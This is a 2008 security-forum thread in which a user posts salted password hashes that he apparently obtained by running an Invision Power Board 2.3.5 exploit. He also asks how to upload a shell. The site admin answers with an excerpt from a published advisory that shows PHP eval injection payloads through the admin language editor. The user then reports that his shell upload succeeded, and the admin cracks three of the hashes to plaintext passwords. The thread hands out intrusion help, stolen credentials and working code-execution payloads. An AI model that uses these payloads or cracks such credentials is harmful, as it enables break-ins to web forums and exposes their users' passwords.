|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
some questions on ipb |
|
Posted: Tue Sep 23, 2008 4:59 pm |
|
|
king424 |
Regular user |
|
|
Joined: Apr 03, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
first:i use ipb2.3.5 exp got some hash,but cann't crack them~
Hash: 4d86409a2fd8dffc4e60c915f83fde77 Salt: c~cfN
Hash: 5a76d0a32d9e713d3f86fef9de08ed10 Salt: 2bzLS
Hash: 6611271cb4fef84dee04fac706bba8bf Salt: G?dvO
Hash: 2482566d9798bd8b66fb7d6ca343e0d1 Salt: ;"u??
Hash: 6afebdbc3da0e5fe025c8c80190d6acf Salt: ]}5td
Hash: b5aa5095177b1fe1d7aba35ddf7c238e Salt: $QmZ;
Hash: 4d1c98ad4b31e1518d0c9036d1922b41 Salt: |3|uE
Hash: 8813d3647b5e23815d80f659ce9a1886 Salt: YgiMC
Hash: 69d047edafb621fc1024366a39a26f01 Salt: &tg0~
Hash: f3df6fde904cfd2905099dba3dfb5a33 Salt: .Qpc}
Hash: 3389e60cf59abffec47f28f42d87d7cd Salt: lq30x
Hash: 06e5fdb9d0b1378cc5b863d3abcb29be Salt: L/(1V
Hash: 0c0a9aba4d194b3b3ddd6458673b7bbe Salt: hM!v%
Hash: 0554c34fc91fd76785e2713f7cfa22c1 Salt: +`{+u
Hash: ea2c88dc1dd3ad67738e72c90677a1c9 Salt: D{|a?
Hash: 6c8bc609808a88090bb90d7e5ea07620 Salt: hA80]
Hash: f5523704af4d3a00c2d7fe59cdc345be Salt: Rv/3W
Hash: 25ffb0cc85ac580f59112fe3ef76ec31 Salt: v|{|=
Hash: e42bde777cffec3766c4e387cd69406b Salt: PkyRo
Hash: 44352b5a1741ec1c382f0aa77f7cdb8e Salt: 8f+n)
Hash: 9a5cc5f20a4d7a61ec25c83e7fa827a5 Salt: meshI
Hash: f2b932b4f7550f3d4ad527abb7ab43b6 Salt: AAo.)
The second:ipb2.3.5 how to upload shell?
thanks for you help! |
|
|
|
|
|
|
|
|
Posted: Tue Sep 23, 2008 8:45 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory
http://acid-root.new.fr/?0:18 |
|
|
|
|
Posted: Wed Sep 24, 2008 6:05 am |
|
|
king424 |
Regular user |
|
|
Joined: Apr 03, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
waraxe wrote: | Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory
http://acid-root.new.fr/?0:18 |
thanks for waraxe.i upload shell Successfull~~
but these hash cracked failure |
|
|
|
|
Posted: Wed Sep 24, 2008 7:55 am |
|
|
martin1 |
Regular user |
|
|
Joined: Sep 21, 2008 |
Posts: 17 |
|
|
|
|
|
|
|
any chance one of you's can gimme some advice with this. As the link you supplied dont work |
|
|
|
|
|
|
|
|
Posted: Wed Sep 24, 2008 8:53 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
martin1 wrote: | any chance one of you's can gimme some advice with this. As the link you supplied dont work |
http://acid-root.new.fr/?0:18
Code: |
Title: Invision Power Board <= 2.3.5
Multiple Vulnerabilities and Security Bypass
Vendor: http://www.invisionpower.com/community/board/
Advisory: http://acid-root.new.fr/?0:18
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2008/08/29
Changelog: 2008/08/30
Summary: Introduction
Blind SQL Injection
Insecure SQL Password Usage
Admin Session Hijacking
Deep Recursion Protection Bypass
Code Execution
Miscellanious
Risk level: Medium / High
...
...
VI - CODE EXECUTION
The ACP allows admins to manage languages, they can
choose the default language, import a new one, and edit
them. Let's take a look in the file "sources/action_admin/
languages.php":
65| switch($this->ipsclass->input['code'])
66| {
..|
88| case 'doedit':
89| $this->ipsclass->admin->cp_permission_check(...);
90| $this->save_langfile();
110| break;
...|
935| function save_langfile()
936| {
...|
957| $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir'].
...| "/".$this->ipsclass->input['lang_file'];
958|
959| if (! file_exists( $lang_file ) ) ...
...|
963|
964| if (! is_writeable( $lang_file ) ) ...
...|
969| $barney = array();
970|
971| foreach ($this->ipsclass->input as $k => $v)
972| {
973| if ( preg_match( "/^XX_(\S+)$/", $k, $match ) )
974| {
975| if ( isset($this->ipsclass->input[ $match[0] ]) )
976| {
977| $v = str_replace("'", "'", stripslashes($_POST[$match[0]]));
978| $v = str_replace("<", "<", $v );
979| $v = str_replace(">", ">", $v );
980| $v = str_replace("&", "&", $v );
981| $v = str_replace("\r", "", $v );
982|
983| $barney[ $match[1] ] = $v;
984| }
985| }
986| }
As you can see, there's several replacements which are
made. Some HTML entities are converted to their applicable
characters. The "stripslashes()" function is also called.
But we don't really care about that, this will not cause
a problem, this was just to show you how user's inputs
are treated. Now let's see how the change is made:
993| $start = "<?php\n\n".'$lang = array('."\n";
994|
995| foreach($barney as $key => $text)
996| {
997| $text = preg_replace("/\n{1,}$/", "", $text);
998| $start .= "\n'".$key."' => \"".str_replace( '"', '\"', $text)."\",";
999| }
1000|
1001| $start .= "\n\n);\n\n?".">";
1002|
1003| if ($fh = fopen( $lang_file, 'w') )
1004| {
1005| fwrite($fh, $start );
1006| fclose($fh);
1007| }
So, there's a protection against double quotes, not all
escape characters. There are several ways to bypass this
protection.
The first method, is to play with what we call "dynamic
variables". With two $, we can execute PHP code.
Example: ${${@eval($_SERVER[HTTP_SH])}}
The second one, is to use another escape character, a
backslash (\) will do the stuff. The attacker must change
two inputs. Example:
First input: hello\
Second input: ); @eval($_SERVER[HTTP_SH]); /*
|
|
|
|
|
|
|
|
|
|
Posted: Wed Sep 24, 2008 10:23 am |
|
|
martin1 |
Regular user |
|
|
Joined: Sep 21, 2008 |
Posts: 17 |
|
|
|
|
|
|
|
Thanks waraxe |
|
|
|
|
Posted: Wed Sep 24, 2008 12:32 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Plaintext of 4d1c98ad4b31e1518d0c9036d1922b41 is forever
Plaintext of 44352b5a1741ec1c382f0aa77f7cdb8e is mugello
Plaintext of 06e5fdb9d0b1378cc5b863d3abcb29be is brabak
|
|
|
|
|
Posted: Thu Sep 25, 2008 5:36 am |
|
|
king424 |
Regular user |
|
|
Joined: Apr 03, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
thanks again!
anyone can crack any others? |
|
|
|
|
Posted: Fri Sep 26, 2008 7:08 am |
|
|
donkey |
Regular user |
|
|
Joined: Sep 26, 2008 |
Posts: 11 |
|
|
|
|
|
|
|
how did u get the salt of that thing ? |
|
|
|
|
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|